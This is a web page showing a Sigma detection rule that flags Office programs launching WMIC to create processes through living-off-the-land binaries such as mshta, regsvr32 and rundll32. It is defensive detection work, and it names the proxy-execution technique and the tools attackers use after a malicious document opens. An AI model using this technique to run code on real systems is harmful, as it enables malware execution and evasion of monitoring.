Suspicious WMIC Execution Via Office Process
Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).
Convert In Phoenix Studio
Open this Sigma rule in the converter with the YAML preloaded and ready for backend selection.
Events generated when a new process is spawned on the system. Covers command-line arguments, parent/child relationships, and process metadata.
detection:
selection_parent:
ParentImage|endswith:
- '\WINWORD.EXE'
- '\EXCEL.EXE'
- '\POWERPNT.exe'
- '\MSPUB.exe'
- '\VISIO.exe'
- '\MSACCESS.EXE'
- '\EQNEDT32.EXE'
- '\ONENOTE.EXE'
- '\wordpad.exe'
- '\wordview.exe'
selection_wmic_img:
- Image|endswith: '\wbem\WMIC.exe'
- OriginalFileName: 'wmic.exe'
selection_wmic_cli:
CommandLine|contains|all:
- 'process'
- 'create'
- 'call'
CommandLine|contains:
# Add more suspicious LOLBINs as you see fit
- 'regsvr32'
- 'rundll32'
- 'msiexec'
- 'mshta'
- 'verclsid'
- 'wscript'
- 'cscript'
condition: all of selection_*False positive likelihood has not been assessed. Additional context may be needed during triage.
Suspicious Microsoft Office Child Process
Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)
This rule was derived from the related rule - both detect similar activity with different scope.
518643ba-7d9c-4fa5-9f37-baed36059f6a
9d1c72f5-43f0-4da5-9320-648cf2099dd0
c0e1c3d5-4381-4f18-8145-2583f06a1fe5
04f5363a-6bca-42ff-be70-0d28bf629ead